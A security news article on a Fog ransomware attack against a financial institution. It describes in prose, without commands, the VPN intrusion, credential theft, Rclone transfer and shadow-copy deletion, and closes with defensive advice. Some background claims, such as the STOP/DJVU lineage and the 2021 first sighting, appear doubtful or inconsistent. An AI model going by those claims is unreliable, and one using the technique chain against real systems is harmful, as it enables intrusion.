The Fog, a ransomware variant belonging to the STOP/DJVU family that was formerly targeting educational and recreational SECTORS, has turned its attention towards profitable targets in the finance industry.
In early August 2024, threat actors used compromised VPN credentials to launch a ransomware attack against a mid-sized financial institution.
Criminals used Fog ransomware (also known as “Lost in the Fog”) to target sensitive data on endpoints running Windows and Linux operating systems.
Nevertheless, Adlumin’s cutting-edge technology—which employs decoy files as sensors to identify ransomware activity within the network—was able to prevent the attack.
Overview of Fog Ransomware
In 2021, the Fog ransomware was first detected. It mostly targets industries like education and recreation and breaches network defenses by taking advantage of vulnerabilities in compromised VPN credentials.
Once within a network, Fog greatly increases its influence by using sophisticated methods, such as pass-the-hash attacks, to escalate privileges to an administrative level.
Further, Fog proceeds to take several steps aimed at breaking network security. These consist of turning off security features, encrypting important files, particularly Virtual Machine Disks (VMDKs), and deleting backup data, leaving victims with little option except to consider paying the ransom.
Typically identified by extensions like “.FOG” or “.FLOCKED,” the encrypted files come with a ransom message that points victims to a Tor network negotiating platform.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial
The attackers used a series of pings sent at different destinations to start the network discovery process. They use the tool ‘Advanced_Port_Scanner_2.5.3869(1).exe’ to conduct network reconnaissance, scanning hosts on the network with elevated privileges from the compromised service accounts.
The Adlumin team determined that the attack came from a Russian IP address and traced the hack to an unprotected device.
By utilizing domain trust relationship information, the attackers were able to travel laterally within the network using two compromised service accounts.
The following stage involved backing up login information saved on endpoints for numerous users, including encrypted Google Chrome credentials, using the Microsoft command-line utility “esentutl.exe.”
The threat actor syncs and transfers data from infected endpoints using ‘Rclone,’ an effective open-source command-line tool.
The tool that was used to spread the ransomware was identified as “locker.exe,” indicating that it played a part in “locking” or encrypting the data.
The ransom message was then posted in a file called “readme.txt” on every compromised endpoint. To prevent victims from being able to restore their files from backups, the attackers also deleted system shadow copies using PowerShell and WMIC commands.
The Arctic Wolf team stated in an analysis released in early June that the threat actors seem more focused on making a quick payout than carrying out a more intricate attack that involves data exfiltration and a well-known leak site.
The Ransomware Prevention feature of Adlumin automatically shuts out the attackers, isolates the compromised devices, and stops data theft.
Multi-factor authentication (MFA), frequent VPN software updates, monitoring VPN access, isolating impacted endpoints, utilizing a comprehensive security platform, backing up crucial information, implementing the principle of least privilege, and creating incident response plans are all recommended.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar